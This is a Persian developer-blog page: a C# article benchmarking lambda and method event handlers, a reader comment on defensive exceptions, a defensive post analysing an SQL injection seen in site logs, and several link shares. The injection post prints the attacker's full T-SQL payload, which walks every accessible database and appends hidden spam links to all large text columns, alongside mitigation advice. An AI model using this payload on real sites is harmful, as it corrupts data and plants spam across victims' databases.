مطالب
Lambda Syntax و کارآیی
در این مطلب می‌خواهیم کارآیی event handlers پیاده سازی شده با روش‌های متفاوتی را مورد بررسی قراردهیم.
به مثال زیر توجه کنید:
class EventSource : System.Progress<int>
{
    public async System.Threading.Tasks.Task<int> PerformExpensiveCalculation()
    {
        var sum = 0;
        for (var i = 0; i < 100; i++)
        {
            await System.Threading.Tasks.Task.Delay(100);
            sum += i;
            this.OnReport(sum);
        }
        return sum;
    }
}

static class Program
{
    static void Main(string[] args)
    {
        var source = new EventSource();
        System.EventHandler<int> handler = (_, progress) => System.Console.WriteLine(progress);
        source.ProgressChanged += handler;
        System.Console.WriteLine(source.PerformExpensiveCalculation().Result);
        source.ProgressChanged -= handler;

        source.ProgressChanged += ProgressChangedMethod;
        System.Console.WriteLine(source.PerformExpensiveCalculation().Result);
        source.ProgressChanged -= ProgressChangedMethod;
    }

    private static void ProgressChangedMethod( object sender, int e )
    {
        System.Console.WriteLine(e);
    }
}
در مثال بالا دو نسخه‌ی مختلف از event handler را با دو روش، (روش اول) با استفاده از Lambda syntax و (روش دوم) با استفاده از یک متد، به صورت جدا تعریف شده، پیاده سازی کرده‌ایم.
خوب؛ برای اندازه گیری کارآیی این دو روش باید کمی فکر کنیم که چه چیزی کارآیی این دو روش را تغییر می‌دهد؟
آیا پردازش event با اضافه کردن و حذف کردن event handler؟ و یا پردازش درون event باعث تغییر در کارآیی می‌شود؟
این، سوال مهمی در تست کارآیی این دو روش مختلف است. اگر پردازش درون event باعث ایجاد تفاوت کارآیی می‌شود، با استفاده از این برنامه می‌توان آن را اندازه گیری کرد. با این حال اگر تفاوت کارآیی با اضافه کردن و حذف کردن event handler اتفاق می‌افتد، با این برنامه بعید است بتوان این روش را تست کرد چرا که فقط یکبار این عمل انجام می‌شود.
قبل از شروع به اندازه گیری کارآیی این دو روش‌، اجازه بدهید ابتدا به کد IL آن‌ها نگاهی کنیم. (روش اول با استفاده از Lambda syntax)
IL_0007:  ldsfld     class [mscorlib]System.EventHandler`1<int32> LambdaPerformance.Program/'<>c'::'<>9__0_0'
IL_000c:  dup
IL_000d:  brtrue.s   IL_0026
IL_000f:  pop
IL_0010:  ldsfld     class LambdaPerformance.Program/'<>c' LambdaPerformance.Program/'<>c'::'<>9'
IL_0015:  ldftn      instance void LambdaPerformance.Program/'<>c'::'<Main>b__0_0'(object, int32)
IL_001b:  newobj     instance void class [mscorlib]System.EventHandler`1<int32>::.ctor(object, native int)
IL_0020:  dup
IL_0021:  stsfld     class [mscorlib]System.EventHandler`1<int32> LambdaPerformance.Program/'<>c'::'<>9__0_0'
IL_0026:  stloc.1
IL_0027:  ldloc.0
IL_0028:  ldloc.1
IL_0029:  callvirt   instance void class [mscorlib]System.Progress`1<int32>::add_ProgressChanged(class [mscorlib]System.EventHandler`1<!0>)
IL_002e:  nop
IL_002f:  ldloc.0
IL_0030:  callvirt   instance class [mscorlib]System.Threading.Tasks.Task`1<int32> LambdaPerformance.EventSource::PerformExpensiveCalculation()
IL_0035:  callvirt   instance !0 class [mscorlib]System.Threading.Tasks.Task`1<int32>::get_Result()
IL_003a:  call       void [mscorlib]System.Console::WriteLine(int32)
IL_003f:  nop
IL_0040:  ldloc.0
IL_0041:  ldloc.1
IL_0042:  callvirt   instance void class [mscorlib]System.Progress`1<int32>::remove_ProgressChanged(class [mscorlib]System.EventHandler`1<!0>)
در بالا 5 دستورالعمل برای اضافه کردن event handler وجود دارد (از IL_0010 تا IL_0029) و یک دستور برای حذف handler وجود دارد (IL_0042).
قبل از شروع مقایسه، کد IL روش دوم را نیز بررسی می‌کنیم:
IL_004a:  ldftn      void LambdaPerformance.Program::ProgressChangedMethod(object, int32)
IL_0050:  newobj     instance void class [mscorlib]System.EventHandler`1<int32>::.ctor(object, native int)
IL_0055:  callvirt   instance void class [mscorlib]System.Progress`1<int32>::add_ProgressChanged(class [mscorlib]System.EventHandler`1<!0>)
IL_005a:  nop
IL_005b:  ldloc.0
IL_005c:  callvirt   instance class [mscorlib]System.Threading.Tasks.Task`1<int32> LambdaPerformance.EventSource::PerformExpensiveCalculation()
IL_0061:  callvirt   instance !0 class [mscorlib]System.Threading.Tasks.Task`1<int32>::get_Result()
IL_0066:  call       void [mscorlib]System.Console::WriteLine(int32)
IL_006b:  nop
IL_006c:  ldloc.0
IL_006d:  ldnull
IL_006e:  ldftn      void LambdaPerformance.Program::ProgressChangedMethod(object, int32)
IL_0074:  newobj     instance void class [mscorlib]System.EventHandler`1<int32>::.ctor(object, native int)
IL_0079:  callvirt   instance void class [mscorlib]System.Progress`1<int32>::remove_ProgressChanged(class [mscorlib]System.EventHandler`1<!0>)
همانطور که مشاهده می‌کنید در روش دوم برای اضافه کردن event handler تنها 3 خط وجود دارند (IL_004a تا IL_0055) و برای حذف کردن آن نیز 3 خط وجود دارند (IL_006e تا IL_0079).

برای اندازه گیری دقیق، برنامه‌ی بالا را کمی تغییر می‌دهیم. ما میزان اضافه و حذف شدن event handler را می‌خواهیم اندازه‌گیری کنیم و کاری به زمان اجرای یک عملیات نداریم. بنابراین فراخوانی ()PerformExpensiveCalculation را comment کرده و به صورت خیلی ساده فقط handler را اضافه و حذف می‌کنیم.
static class Program
{
    static void Main(string[] args)
    {
        for (var repeats = 10; repeats <= 1000000; repeats *= 10)
        {
            VersionOne(repeats);
            VersionTwo(repeats);
        }
    }

    private static void VersionOne(int repeats)
    {
        var timer = new System.Diagnostics.Stopwatch();
        timer.Start();

        var source = new EventSource();
        for (var i = 0; i < repeats; i++)
        {
            System.EventHandler<int> handler = (_, progress) => System.Console.WriteLine(progress);
            source.ProgressChanged += handler;
            // Console.WriteLine(source.PerformExpensiveCalculation().Result);
            source.ProgressChanged -= handler;
        }

        timer.Stop();

        System.Console.WriteLine($"Version one: {repeats} add/remove takes {timer.ElapsedMilliseconds}ms");
    }

    private static void VersionTwo(int repeats)
    {
        var timer = new System.Diagnostics.Stopwatch();
        timer.Start();

        var source = new EventSource();
        for (var i = 0; i < repeats; i++)
        {
            source.ProgressChanged += ProgressChangedMethod;
            // Console.WriteLine(source.PerformExpensiveCalculation().Result);
            source.ProgressChanged -= ProgressChangedMethod;
        }

        timer.Stop();

        System.Console.WriteLine($"Version two: {repeats} add/remove takes {timer.ElapsedMilliseconds}ms");
    }

    private static void ProgressChangedMethod(object sender, int e)
    {
        System.Console.WriteLine(e);
    }
}
و چنین خروجی را تولید می‌کند (البته نسبت به سرعت CPU این زمان‌ها متفاوت خواهد بود)
Version one: 10 add/remove takes 0ms
Version two: 10 add/remove takes 0ms
Version one: 100 add/remove takes 0ms
Version two: 100 add/remove takes 0ms
Version one: 1000 add/remove takes 0ms
Version two: 1000 add/remove takes 0ms
Version one: 10000 add/remove takes 0ms
Version two: 10000 add/remove takes 1ms
Version one: 100000 add/remove takes 8ms
Version two: 100000 add/remove takes 13ms
Version one: 1000000 add/remove takes 93ms
Version two: 1000000 add/remove takes 121ms
خوب؛ اگر در یک اجرای برنامه، شما یک میلیون بار event handler را اضافه و حذف کنید، 28ms می‌توانید صرفه جویی کنید (در روش اول).

توجه:
اگر در برنامه‌ی شما یک میلیون بار event handler اضافه و حذف می‌شوند، نیاز به بازنگری مجدد در طراحی کلی برنامه تان دارد.

یک اشتباه بزرگ

با ایجاد یک تغییر در روش اول (Lambda syntax)، ممکن است تاثیر بسیار زیادی را در عملکرد برنامه مشاهده کنید:
private static void VersionOne(int repeats)
{
    var timer = new System.Diagnostics.Stopwatch();
    timer.Start();

    var source = new EventSource();
    for (var i = 0; i < repeats; i++)
    {
        // System.EventHandler<int> handler = (_, progress) => System.Console.WriteLine(progress);
        source.ProgressChanged += (_, progress) => System.Console.WriteLine(progress);
        // Console.WriteLine(source.PerformExpensiveCalculation().Result);
        source.ProgressChanged -= (_, progress) => System.Console.WriteLine(progress);
    }

    timer.Stop();

    System.Console.WriteLine($"Version one: {repeats} add/remove takes {timer.ElapsedMilliseconds}ms");
}
به جای تعریف یک متغیر محلی برای عبارت Lambda، دستور اضافه و حذف کردن event handler را به صورت inline استفاده کردیم. خروجی این روش به صورت زیر می‌شود:
Version one: 10 add/remove takes 0ms
Version two: 10 add/remove takes 0ms
Version one: 100 add/remove takes 1ms
Version two: 100 add/remove takes 0ms
Version one: 1000 add/remove takes 102ms
Version two: 1000 add/remove takes 0ms
Version one: 10000 add/remove takes 10509ms
Version two: 10000 add/remove takes 1ms
Version one: 100000 add/remove takes 1039014ms
Version two: 100000 add/remove takes 11ms
همانطور که مشاهده می‌کنید، روش اول خیلی خیلی آهسته است. توجه کنید من بعد از یکصد هزار بار اضافه و حذف کردن handler، به دلیل طولانی شدن، عملیات را قطع کردم. خب دلیل این همه کندی چیست؟ بیایید نگاهی به کد IL درون حلقه‌ی روش اول بیاندازیم.
  IL_0018:  nop
  IL_0019:  ldloc.1
  IL_001a:  ldsfld     class [mscorlib]System.EventHandler`1<int32> LambdaPerformance.Program/'<>c'::'<>9__1_0'
  IL_001f:  dup
  IL_0020:  brtrue.s   IL_0039
  IL_0022:  pop
  IL_0023:  ldsfld     class LambdaPerformance.Program/'<>c' LambdaPerformance.Program/'<>c'::'<>9'
  IL_0028:  ldftn      instance void LambdaPerformance.Program/'<>c'::'<VersionOne>b__1_0'(object, int32)
  IL_002e:  newobj     instance void class [mscorlib]System.EventHandler`1<int32>::.ctor(object, native int)
  IL_0033:  dup
  IL_0034:  stsfld     class [mscorlib]System.EventHandler`1<int32> LambdaPerformance.Program/'<>c'::'<>9__1_0'
  IL_0039:  callvirt   instance void class [mscorlib]System.Progress`1<int32>::add_ProgressChanged(class [mscorlib]System.EventHandler`1<!0>)
  IL_003e:  nop
  IL_003f:  ldloc.1
  IL_0040:  ldsfld     class [mscorlib]System.EventHandler`1<int32> LambdaPerformance.Program/'<>c'::'<>9__1_1'
  IL_0045:  dup
  IL_0046:  brtrue.s   IL_005f
  IL_0048:  pop
  IL_0049:  ldsfld     class LambdaPerformance.Program/'<>c' LambdaPerformance.Program/'<>c'::'<>9'
  IL_004e:  ldftn      instance void LambdaPerformance.Program/'<>c'::'<VersionOne>b__1_1'(object, int32)
  IL_0054:  newobj     instance void class [mscorlib]System.EventHandler`1<int32>::.ctor(object, native int)
  IL_0059:  dup
  IL_005a:  stsfld     class [mscorlib]System.EventHandler`1<int32> LambdaPerformance.Program/'<>c'::'<>9__1_1'
  IL_005f:  callvirt   instance void class [mscorlib]System.Progress`1<int32>::remove_ProgressChanged(class [mscorlib]System.EventHandler`1<!0>)
  IL_0064:  nop
  IL_0065:  nop
  IL_0066:  ldloc.2
  IL_0067:  stloc.3
  IL_0068:  ldloc.3
  IL_0069:  ldc.i4.1
  IL_006a:  add
  IL_006b:  stloc.2
  IL_006c:  ldloc.2
  IL_006d:  ldarg.0
  IL_006e:  clt
  IL_0070:  stloc.s    V_4
  IL_0072:  ldloc.s    V_4
  IL_0074:  brtrue.s   IL_0018
به خطهای ( IL_0028 و IL_0034 و IL_004e و IL_005a ) در کد بالا دقت کنید. توجه داشته باشید که event handler اضافه شده با event handler حذف شده، با هم متفاوت هستند. حذف کردن event handler ای که به جایی متصل نیست باعث ایجاد خطا نمی‌شود ولی کاری هم انجام نمی‌دهد. بنابراین اتفاقی که در روش اول درون حلقه می‌افتد این است که بیش از یک میلیون بار event handler به delegate اضافه می‌شود. همه‌ی آنها یکسان هستند؛ اما همچنان CPU و حافظه مصرف می‌کنند.

ممکن است شما به این نتیجه رسیده باشید که استفاده از Lambda syntax برای اضافه و حذف کردن event handler آهسته‌تر از، استفاده از متد جدا است، این یک اشتباه بزرگ است. در صورتی که شما اضافه و حذف کردن event handler را با استفاده از Lambda syntax به شکل صحیح انجام ندهید، به سرعت، در معیارهای کارآیی خود را نشان می‌دهد.

دانلود برنامه بالا
نظرات مطالب
Defensive Programming - بازگشت نتایج قابل پیش بینی توسط متدها
چند سؤال:
- با توجه به اینکه متد CheckIsDeactiveAsync عموما در لایه سرویس قرار می‌گیرد، آیا وظیفه‌ی این لایه صدور استثناء به علت یافت نشدن یک کاربر است و یا استفاده کننده‌ی از این سرویس باید بر اساس نتیجه‌ی آن عکس العمل نشان دهد؟
- صدور استثناء در یک برنامه زمانی باید صورت گیرد که واقعا دیگر هیچ کار خاصی از دست ما ساخته نیست. مثلا هارد دیسک پر شده‌است. شبکه در دسترس نیست و ... مطابق مآخذی که عنوان کردید «... در واقع استثنا‌ها حالت‌هایی هستند که غیرقابل پیش‌بینی هستند ...»  آیا اینکه رکورد کاربری در دیتابیس موجود نیست هم جزو موارد غیرقابل پیش بینی است؟
- آیا استفاده‌ی از «الگوی شیء نال Null Object Pattern» و یا «پیاده سازی Option یا Maybe در #C» بیشتر به واژه‌ی «defensive» نزدیک نیستند در این حالت که برای مثال کاربری یافت نشده‌است؟
مطالب
نمونه‌ای از تزریق اس کیوال جهت درج تبلیغات مخفی شده‌ی در رکوردهای سایت
مدتی هست در لاگ‌های ELMAH سایت، یک چنین تزریق‌های اس کیوال ناموفقی مشاهده می‌شوند:


اگر اخیرا به دیتابیس شما رکوردهایی با divهای نامرئی ("div style="display:none) که داخل آن‌ها تبلیغات یک سری سایت‌های کذایی وجود دارند، اضافه شده‌اند، حتما مورد حمله‌ی SQL Injection فوق واقع شده‌اید.

مواردی را که باید بررسی کنید:
الف) آیا در سایت، قسمت ثبت ارجاعات را دارید؟
قبل از اینکه HTTP Referrer را بررسی کنید، یکبار آن‌را به عنوان پارامتر سازنده‌ی new Uri قرار دهید. به این صورت این حمله دقیقا در همین مرحله، با صدور یک استثناء، به علت معتبر نبودن آدرس دریافتی متوقف می‌شود:


ب) آیا در سایت، نوع مرورگرهای کاربران را نیز ذخیره می‌کنید؟
با توجه به شکل اول، این حمله تنها زمانی مؤثر خواهد بود که از کوئری‌های غیرپارامتری و یا از ORMها استفاده نمی‌کنید.

ج) آیا به محتوای دریافت شده‌ی از طریق کوئری استرینگ‌ها دقت دارید؟
این مورد نیز همانند حالت ب است.


بررسی ساختار این حمله

کوئری ارسالی (البته با حذف آدرس سایت‌های کذایی آن)، یک چنین فرمتی را دارد:
DECLARE @b AS CURSOR;

DECLARE @s AS VARCHAR (8000);

DECLARE @w AS VARCHAR (99);

SET @b = CURSOR
    FOR SELECT DB_NAME()
        UNION
        SELECT name
        FROM   sys.databases
        WHERE  (has_dbaccess(name) != 0)
               AND name NOT IN ('master', 'tempdb', 'model', 'msdb', DB_NAME());

OPEN @b;

FETCH NEXT FROM @b INTO @w;

WHILE @@FETCH_STATUS = 0
    BEGIN
        SET @s = 'begin try use ' + @w + ';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set 
[''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style="display:none">desi adult stories <a 
href="http://www.site.com/">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''stories'''' when 1 then ''''read'''' else ''''stories'''' end +''''</a> stories</div>'''' 
else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME 
WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while 
@@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';
        EXECUTE (@s);
        FETCH NEXT FROM @b INTO @w;
    END

CLOSE @b;
در اینجا ابتدا لیست بانک‌های اطلاعاتی موجود دریافت می‌شوند. سپس با استفاده از try/catch سعی در به روز رسانی رکوردهای جداولی که دارای فیلدهایی از نوع varchar یا nvarchar از نوع max هستند، می‌کند. از try/catch هم به این دلیل استفاده کرده‌است که در یک سایت اشتراکی، شما فقط به بانک اطلاعاتی خودتان دسترسی دارید و البته اگر از کاربر sa استفاده می‌کنید که ... هم اکنون تمام بانک‌های اطلاعاتی شما آلوده شده‌اند!
به روز رسانی آن هم رندام است. یعنی در یک سری رکورد، بر اساس case نوشته شده، تبلیغ خواندن و در یک سری دیگر، تبلیغ داستانی را در انتهای آن‌ها درج می‌کند.
اشتراک‌ها
اضافه شدن قابلیتی به ویندوز 11 به نام «Dev Drive» جهت بالابردن سرعت کار با پروژه‌های بزرگ برنامه نویسی

Dev Drive definitely speeds up the build time and that leads into faster software development. I got approx 25% improvement into build times simply by copying my source code folders into dev drive. 

اضافه شدن قابلیتی به ویندوز 11 به نام «Dev Drive» جهت بالابردن سرعت کار با پروژه‌های بزرگ برنامه نویسی
اشتراک‌ها
آموزش مقدماتی WebGL

WebGL is an in-browser 3D renderer based on OpenGL, which lets you display your 3D content directly into an HTML5 page. Throughout this series I will cover all the essentials you need to get started using this framework. We'll start with an introduction, then we'll be building on to the framework that we used in part one as well as adding a model importer and a custom class for 3D objects. You will also be introduced to animation and controls. Lastly, we’ll take a look at lighting and adding 2D objects to your scene. 

آموزش مقدماتی WebGL
اشتراک‌ها
کتابخانه k6

k6 is an open-source load testing tool for testing the performance of your systems. It’s built with Go and JavaScript to integrate well into your development workflow, so you can stay on top of performance without fuzz. 

کتابخانه k6